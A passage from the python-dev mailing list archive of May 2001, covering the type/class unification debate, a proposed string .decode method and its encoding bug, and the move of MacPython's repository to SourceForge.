--Guido van Rossum (home page: http://www.python.org/~guido/)


From paulp at ActiveState.com  Fri May 11 01:22:16 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 16:22:16 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com>
Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com>

Jeremy Hylton wrote:
> 
> >>>>> "PP" == Paul Prescod <paulp at ActiveState.com> writes:
> 
>   PP> I would like to argue that "plain old C types" should act as if
>   PP> they have __dict__s for consistency with other types. It is
>   PP> sometimes useful to be able to annotate objects by adding
>   PP> attributes to them. But this only works with class instance
>   PP> objects, not instances of types.
> 
> Every type should have an __dict__ of type dict?  Then every dict
> must have an __dict__, including the __dict__ of __dict__?

What's wrong with that? Every object has a type, even type objects, and
type types. It only becomes a problem if you try to recursively walk all
the dictionaries in the system adding information to them. Otherwise
they have null pointers that "act as if" they were empty dictionaries.

> Once every object has an __dict__, every object will be mutable.  Then
> no object will be usable as a dict key and we can get rid of dict's
> entirely.

According to that argument, instances cannot be dictionary keys. That is
simply not true. Objects do not implement their hash functions in terms
of ALL of their attributes!

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mwh at python.net  Fri May 11 01:31:53 2001
From: mwh at python.net (Michael Hudson)
Date: Fri, 11 May 2001 00:31:53 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10
Message-ID: <Pine.LNX.4.30.0105110031170.14911-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 Apr 26 and May 9 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list at python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration) All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the seventh summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 228

    40 |                         [|]
       |                         [|]
       |                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    30 |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    20 |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|] [|]                 [|]
       |     [|]                 [|] [|] [|]             [|] [|]
       |     [|]                 [|] [|] [|]             [|] [|]
    10 |     [|]                 [|] [|] [|]         [|] [|] [|]
       |     [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
     0 +-007-024-010-001-010-010-044-023-019-010-002-012-017-039
        Thu 26| Sat 28| Mon 30| Wed 02| Fri 04| Sun 06| Tue 08|
            Fri 27  Sun 29  Tue 01  Thu 03  Sat 05  Mon 07  Wed 09

  A fairly quiet, but interesting fortnight (and I don't mean the
  sarcastic replies to the Homepage virus).  A few build problems and
  bugs fixed, and one very involved discussion (cf. most of the rest
  of this summary).


    * type == class? *

 Guido posted a message from Jim Althoff describing the metaclass
 system used in Smalltalk:

  <http://mail.python.org/pipermail/python-dev/2001-May/014508.html>

 He also mentioned a problem that is bound to bite any attempt to heal
 the type/class split in Python.  If there are to be no special cases
 in the type system then classes and types in particular should be
 instances.  This sounds innocuous, but consider:

    class MyDictType(DictType):
        def __repr__(self):
            return "MyDictType(%s)" % DictType.__repr__(self)

 The code is hoping that, as in today's Python, DictType.__repr__ will
 return an unbound method - the __repr__ method of vanilla
 dictionaries, so that output of the form

    MyDictType({1:2})

 will be given.  But DictType is now an instance, so there's another
 interpretation for DictType.__repr__ - the bound DictType's own
 __repr__ method!  This is a fundamental problem; currently
 "class.attr" and "instance.attr" have different meanings in Python,
 and any attempt to conflate the notions of "class" and "instance" is
 bound to run aground.  Guido proposed some hairy disambiguation rules
 in the above-linked message, but no-one was particularly enthused
 about them, possibly because no-one could really get their head round
 them.

 The long term solution is to change the syntax for getting - or
 removing entirely - unbound methods.  As far as anyone can make out,
 all that unbound methods are used for is called superclasses' methods
 from overriding methods, so if one can find another way of spelling
 that, then removing unbound methods entirely could be contemplated.
 So the discussion on that went around for a bit, with no really new
 compelling ideas surfacing.  There was some support for some kind of
 souped up super.foo() construct:

  <http://mail.python.org/pipermail/python-dev/2001-May/014523.html>

 To me, the most plausible ideas came from Thomas Heller:

  <http://mail.python.org/pipermail/python-dev/2001-May/014517.html>

 and from Paul Dubois, who suggested nicking the feature renaming
 feature from Eiffel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014573.html>

 though the best syntax for the latter is far from clear.

 There's also the king-sized issue of backwards compatibility; to a
 first degree of approximation, *all* Python code that uses
 inheritance would need to be updated to accommodate changes in the
 meaning of "class.attribute".  Another __future__ statement, maybe?


    * data.decode *

 Marc-Andre Lemburg asked if it might be an idea if string objects
 sprouted an .decode method:

  <http://mail.python.org/pipermail/python-dev/2001-May/014547.html>

 After some umming and arring and accusations of bloat, this got BDFL
 approval, and should appear in CVS imminently.


    * Moving MacPython to sourceforge *

 Jack Jansen posted notice that he intends to move the MacPython code
 over to sourceforge:

  <http://mail.python.org/pipermail/python-dev/2001-May/014611.html>

 It will be nice to finally have all the code in the same place!

Cheers,
M.


From paulp at ActiveState.com  Fri May 11 02:26:43 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 17:26:43 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>
Message-ID: <3AFB31C3.5CEF9064@ActiveState.com>

Guido van Rossum wrote:
> 
>...
> 
> Good point.  Plain old types currently (in the descr-branch) have a
> readonly dict (using a proxy) and no settable attributes.  I will
> probably give types settable attributes in a next revision, but I
> prefer not to make the type's dict writable -- I need to be able to
> watch the setattr calls so that if someone changes
> DictType.__getitem__ I can change the mp_subscript to a C function
> that calls the __getitem__ method.  

I'm happy to have you look and see if I'm setting something magical. But
if I'm not, I would like you to just add the thing I made to an internal
private dictionary and remember it. I think that's what you are talking
about.

>...
> If you're talking about *instances*: instances of subtypes of built-in
> types have a dict of their own to which you can add stuff to your
> heart's content.  Instances of built-in types will continue not to
> have a dict (it would cost too much space if *every* object had a
> dict, even if it was a NULL pointer when no attrs are defined).

Darn. That *is* what I was hoping for.

There is an implementation that is slowish if you use it, but has little
cost if you don't: keep a big dict mapping object pointers to their
associated dictionaries (if any). For purposes of discussion, call it
sys._associations. Then have the getattr on "PyObject" look in this dict
of dicts for attributes that it can't otherwise find, and setattr
construct dictionaries in the dict of dicts if necessary.

That's the usual workaround anyhow so this would be a nicer syntax and a
more orthoganal model.

Price: a hasattr that would return false or getattr that would raise
AttributeError would be a little slower. They would have to check the
dictionary of dictionaries before deciding that they really don't have
the attribute.
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido at digicool.com  Fri May 11 03:57:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 20:57:36 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST."
             <3AFB31C3.5CEF9064@ActiveState.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>  
            <3AFB31C3.5CEF9064@ActiveState.com> 
Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com>

> > Good point.  Plain old types currently (in the descr-branch) have a
> > readonly dict (using a proxy) and no settable attributes.  I will
> > probably give types settable attributes in a next revision, but I
> > prefer not to make the type's dict writable -- I need to be able to
> > watch the setattr calls so that if someone changes
> > DictType.__getitem__ I can change the mp_subscript to a C function
> > that calls the __getitem__ method.  
> 
> I'm happy to have you look and see if I'm setting something magical. But
> if I'm not, I would like you to just add the thing I made to an internal
> private dictionary and remember it. I think that's what you are talking
> about.

OK, we agree on this one.

> >...
> > If you're talking about *instances*: instances of subtypes of built-in
> > types have a dict of their own to which you can add stuff to your
> > heart's content.  Instances of built-in types will continue not to
> > have a dict (it would cost too much space if *every* object had a
> > dict, even if it was a NULL pointer when no attrs are defined).
> 
> Darn. That *is* what I was hoping for.
> 
> There is an implementation that is slowish if you use it, but has little
> cost if you don't: keep a big dict mapping object pointers to their
> associated dictionaries (if any). For purposes of discussion, call it
> sys._associations. Then have the getattr on "PyObject" look in this dict
> of dicts for attributes that it can't otherwise find, and setattr
> construct dictionaries in the dict of dicts if necessary.
> 
> That's the usual workaround anyhow so this would be a nicer syntax and a
> more orthoganal model.
> 
> Price: a hasattr that would return false or getattr that would raise
> AttributeError would be a little slower. They would have to check the
> dictionary of dictionaries before deciding that they really don't have
> the attribute.

Personally, if you want this outrageous implementation, you should be
paying for it, not the infrastructure.  It feels contrary to Python's
treatment of objects.  I don't like elaborate workarounds in the
implementation like this -- probably because the performance model
becomes muddy.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Fri May 11 03:05:11 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 11 May 2001 13:05:11 +1200 (NZST)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com>
Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz>

Paul Prescod <paulp at ActiveState.com>:

> Otherwise
> they have null pointers that "act as if" they were empty
> dictionaries.

Actually, they need to act as if they were empty except for
a "__dict__" slot which contains another one of these magic
things. :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From barry at digicool.com  Fri May 11 05:45:38 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 23:45:38 -0400
Subject: [Python-Dev] Interview with Mark Lutz
Message-ID: <15099.24674.311472.184935@anthem.wooz.org>

Great interview with Mark on the ORA site, linked from /.

    http://python.oreilly.com/news/python_0501.html

-Barry


From fredrik at effbot.org  Fri May 11 07:57:34 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 07:57:34 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org>
Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid>

barry wrote:

> Great interview with Mark on the ORA site, linked from /.
> 
>     http://python.oreilly.com/news/python_0501.html

you mean that python-devers read slashdot for python news,
when you have the daily url:

    http://www.pythonware.com/daily

Cheers /F


From thomas at xs4all.net  Fri May 11 11:02:26 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 11 May 2001 11:02:26 +0200
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com> <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>
Message-ID: <20010511110226.M16486@xs4all.nl>

On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote:

[ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets
  bitten in the derriere ]

>   This begs the question, though -- should tests that create temp
> files check that the files don't already exist, and fail with a more
> descriptive error if they do?

I'd think so, yes. I'd also suggest nothing uses something as lamenamed as
'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the
first account :) How about mmap calls its test-testfile 'test_mmap.foo' ?

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Fri May 11 11:34:25 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:34:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFBB221.F29BCB9A@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > I've attached the patch. Due to a small reorganisation the patch is
> > a little longer -- symmetry has its price at C level too ;-)
> 
> I may be being dense, but can you explain what's going on here:
> 
> ->> u'\u00e3'.encode('latin-1')
> '\xe3'
> ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> Traceback (most recent call last):
>   File "<input>", line 1, in ?
> UnicodeError: ASCII encoding error: ordinal not in range(128)

The string.decode() method will try to reuse the Unicode
codecs here. To do this, it will have to convert the string
to Unicode first and this fails due to the character not being
in the ASCII range.

> Can you come up with some other example I can use it tomorrow's
> python-dev summary?

I will add some codecs which make the .decode() method useful
next week. The ones I have in mind are base64, hex and some of
the other binascii codecs. Also, the ROT13 codec I posted will
go into the core as simple example.

With those you will be able to write:

data.encode('base64').decode('base64')

and get back data.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Fri May 11 11:43:14 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 11:43:14 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com>
Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid>

mal wrote:

> > I may be being dense, but can you explain what's going on here:
> > 
> > ->> u'\u00e3'.encode('latin-1')
> > '\xe3'
> > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > Traceback (most recent call last):
> >   File "<input>", line 1, in ?
> > UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> The string.decode() method will try to reuse the Unicode
> codecs here. To do this, it will have to convert the string
> to Unicode first and this fails due to the character not being
> in the ASCII range.

can you take that again?  shouldn't michael's example be
equivalent to:

    unicode(u"\u00e3".encode("latin-1"), "latin-1")

if not, I'd argue that your "decode" design is broken, instead
of just buggy...

Cheers /F


From mal at lemburg.com  Fri May 11 11:50:24 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:50:24 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid>
Message-ID: <3AFBB5E0.620710C8@lemburg.com>

Fredrik Lundh wrote:
> 
> barry wrote:
> 
> > Great interview with Mark on the ORA site, linked from /.
> >
> >     http://python.oreilly.com/news/python_0501.html
> 
> you mean that python-devers read slashdot for python news,
> when you have the daily url:
> 
>     http://www.pythonware.com/daily

I just bought one of those nice machines that can run pippy
and was wondering how to get AvantGo (the channel software that
comes with it) to synchronize with your daily URL... wouldn't it
be possible to setup a channel for this ? The AvantGo channels
can be registered at their site (http://www.avantgo.com), but the
contents would have to be "mobile friendly"... anyway, just a 
thought ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 11 12:07:40 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 12:07:40 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid>
Message-ID: <3AFBB9EC.F75C158D@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > > I may be being dense, but can you explain what's going on here:
> > >
> > > ->> u'\u00e3'.encode('latin-1')
> > > '\xe3'
> > > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > > Traceback (most recent call last):
> > >   File "<input>", line 1, in ?
> > > UnicodeError: ASCII encoding error: ordinal not in range(128)
> >
> > The string.decode() method will try to reuse the Unicode
> > codecs here. To do this, it will have to convert the string
> > to Unicode first and this fails due to the character not being
> > in the ASCII range.
> 
> can you take that again?  shouldn't michael's example be
> equivalent to:
> 
>     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> 
> if not, I'd argue that your "decode" design is broken, instead
> of just buggy...

Well, it is sort of broken, I agree. The reason is that 
PyString_Encode() and PyString_Decode() guarantee the returned
object to be a string object. To be able to reuse Unicode codecs
I added code which converts Unicode back to a string in case the
codec return an Unicode object (which the .decode() method does).
This is what's failing.

Perhaps I should simply remove the restriction and have both
APIs return the codec's return object as-is ?! (I would be in
favour of this, but I'm not sure whether this is already in use 
by someone...)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Fri May 11 15:31:18 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 08:31:18 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST."
             <200105110157.UAA03123@cj20424-a.reston1.va.home.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com>  
            <200105110157.UAA03123@cj20424-a.reston1.va.home.com> 
Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>

> > > Good point.  Plain old types currently (in the descr-branch) have a
> > > readonly dict (using a proxy) and no settable attributes.  I will
> > > probably give types settable attributes in a next revision, but I
> > > prefer not to make the type's dict writable -- I need to be able to
> > > watch the setattr calls so that if someone changes
> > > DictType.__getitem__ I can change the mp_subscript to a C function
> > > that calls the __getitem__ method.  

Alas, I think I'll have to withdraw this promise for now.  The truly
built-in types are static objects that are shared between all
interpreter instances within one process, and each type has only one
dictionary pointer.  So changes to the __dict__ would affect other
interpreter instances, and that's unacceptable.

I've thought about alternatives; I can't give each interpreter its own
set of types because sometimes objects are shared between interpreters
(e.g. the dictionary of interned strings), and then then their types
have to be shared too!  Not having any object sharing would mean too
much of a change to the foundations of the implementation.

I think we'll have to live with this restriction until Python 3000.
Personally, I don't mind -- I see mostly possible abuses for the
ability to change attributes of e.g. DictType or StringType. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g at Virginia.EDU  Fri May 11 15:43:32 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 09:43:32 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105110919490.501-100000@localhost>


Catching up on this thread -- mostly because it looks like I'm
going to have to use ExtensionClass to make pyobjc classes into
python classes rather than types -- you can add that to the 
lisp of real world uses of Don's  Metaclass hack that Tim  
questioned. 

 Reading up on MetaClasses in Smalltalk again makes me appreciate
the simplicity of a prototype system where everything is just
an object -- all objects can be cloned, and some objects are 
only used for cloning -- they are the exemplars of their type
which fill the role of Classes. 

 Unfortunately, although prototypes would be a lot simpler, it 
would be a pretty incompatible change for Python -- I can't think
of any way to get there without a lot of breakage. 

 (Still -- I wonder if there's a way they could be used under
the covers in the implementation to make it simpler. Prototype
semantics are basically a superset of Class based semantics, which
is how it was easy to do Smalltalk in Self.)

 Classes are necessary for statically typed O-O languages, but 
IMHO, make a lot less sense for dynamic languages. If Py3K were
to be a clean start, I'ld urge basing it on prototypes, but as
an incremental creation -- I don't know how to get there from 
here (unless it could sneak in under the implementation covers!)


 BTW: XlispStat, which has a prototype object system with multiple
inheritence also doesn't have "super" -- there is a 
(call-next-method [ args... ]) function/macro which searches for
 the base classes. I'm sure there's a lower level function to 
 just get the next method, but typically, call-next-method is
 what's used. There is no search for non-method attributes, as
 all of the base class instance vars are merged and made into
 slots of the instance itself. ( There's no class variables -- 
 there's no classes.) 

 The closest python equivalent would be, as has been discussed
in this thread, a  super method or function that does attribute
 lookup on the bases. 


-- Steve Majewski


From nas at python.ca  Fri May 11 16:06:39 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 11 May 2001 07:06:39 -0700
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010511070639.A1402@glacier.fnational.com>

noreply at sourceforge.net wrote:
> Module objects currently don't define the tp_getattro 
> or tp_setattro slots.  As a result, interning of 
> attribute names does them no good:  a char* is always 
> passed, so the dict lookup always needs to do a string 
> compare despite that the attribute name is interned.

I think this is a problem in classobject.c:generic_binary_op as
well.  PyObject_GetAttrString is always used.  I believe the old
code interned names like "__add__" and used PyObject_GetAttr.  Is
it worth fixing this?

  Neil


From guido at digicool.com  Fri May 11 17:13:56 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 10:13:56 -0500
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST."
             <20010511070639.A1402@glacier.fnational.com> 
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>  
            <20010511070639.A1402@glacier.fnational.com> 
Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com>

> I think this is a problem in classobject.c:generic_binary_op as
> well.  PyObject_GetAttrString is always used.  I believe the old
> code interned names like "__add__" and used PyObject_GetAttr.  Is
> it worth fixing this?

Maybe.  I'd give this low priority.  If my descriptor branch work goes
well, most of classobject.c *may* disappear in favor of the newly
swollen typeobject.c. ;-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jack at oratrix.nl  Fri May 11 16:29:24 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:29:24 +0200
Subject: [Python-Dev] Mac CVS repository moved to sourceforge
Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl>

Folks,
the Python/Mac repository has been moved to sourceforge, and is integrated 
with the general Python repository, so from now on a single CVS tree suficces 
to build MacPython.

I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more 
weeks and then it'll disappear.

Note that the pythoncvs.oratrix.nl repository is still the source for some of 
the optional libraries you need to build MacPython, but that's only if you 
want to build it completely from CVS.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From martin at loewis.home.cs.tu-berlin.de  Fri May 11 16:41:33 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 11 May 2001 16:41:33 +0200
Subject: [Python-Dev] Mac hierarchy backwards
Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>

First, thanks to Jack Jansen for integrating the Mac sources; this is
a good thing.

It seems, however, that some of the directory structure is backwards:
Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
may be others of this kind.

I also wonder whether all these files are still needed, and meant to
be distributed. E.g. I see chdir.c having the comment

/* Chdir for the Macintosh.
   Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
   Pathnames must be Macintosh paths, with colons as separators. */

Is it really the case that the Mac API hasn't grown a chdir call in 13
years?

Regards,
Martin


From fdrake at acm.org  Fri May 11 16:55:33 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 10:55:33 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>

Martin v. Loewis writes:
 > It seems, however, that some of the directory structure is backwards:
 > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
 > may be others of this kind.

  I agree that this should be the goal; I don't know if Jack's release
procedure would need to be revised before that can happen.  If so, I'd
encourage him to do so.

 > Is it really the case that the Mac API hasn't grown a chdir call in 13
 > years?

  Yikes!  I just search developer.apple.com for "chdir" and came up
with no hits, but I really don't know just what that tells me.
chdir() is required for POSIX compliance, but it isn't mentioned in
the C9X final committee draft.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From jack at oratrix.nl  Fri May 11 16:56:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:56:39 +0200
Subject: [Python-Dev] Mac hierarchy backwards 
In-Reply-To: Message by "Martin v. Loewis" <martin@loewis.home.cs.tu-berlin.de>
  ,
	     Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> 
Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl>

> It seems, however, that some of the directory structure is backwards:
> Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
> may be others of this kind.

Yes, now that the Mac stuff is integrated with the mainstream again this might 
be a good idea.

> I also wonder whether all these files are still needed, and meant to
> be distributed. E.g. I see chdir.c having the comment
> 
> /* Chdir for the Macintosh.
>    Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
>    Pathnames must be Macintosh paths, with colons as separators. */
> 
> Is it really the case that the Mac API hasn't grown a chdir call in 13
> years?

Hmm, hmm, I'm unsure.

MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current 
directories (by design. Whether I agree with the design is a different 
matter:-).

Normally MacPython is built with a special unix-compatibility library, GUSI, 
which does provide these calls. However, it is still possible to build without 
GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in 
it's MacOS API model") I've used these compatibility routines again, until I 
finally got GUSI ported.

But its easy enough to cvs-remove them from the normal tree, to be revived 
when needed. What do people think?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From pedroni at inf.ethz.ch  Fri May 11 16:56:48 2001
From: pedroni at inf.ethz.ch (Samuele Pedroni)
Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST)
Subject: [Python-Dev] Type/class
Message-ID: <200105111456.QAA00228@core.inf.ethz.ch>

Hi.

> 
>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
I agree, I often read that Smalltalk is "simple" up to metaclasses,
on the other hand the casual user can just ignore them.

>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)
> 
[Ignoring the fact that code and changes require coders]

Thinking in terms of proto-objects, parent slots and list parent slots:

python instance I have data slots and a parent slot __class__,

python classe G have data slots and a list parent slot __bases__,

then we have the python rules (not very uniforms):
function from I directly => function
function from I.__class__ => bound method
function from C => unbound method

That's the difficult part for every model that aims to remain compatible.

Samuele Pedroni.


From thomas.heller at ion-tof.com  Fri May 11 17:40:10 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Fri, 11 May 2001 17:40:10 +0200
Subject: [Python-Dev] Type/class
References: <Pine.NXT.4.21.0105110919490.501-100000@localhost>
Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>

>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)

I never looked at Self or other prototype based systems.
Is it really true that prototypes are a lot simpler than
metaclasses, but on the other hand more powerful?

The 'brain exploding properties' of metaclasses are IMO
only there because my brain cannot think easily in too
many recursion steps...

Thomas


From fdrake at acm.org  Fri May 11 18:25:54 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 12:25:54 -0400 (EDT)
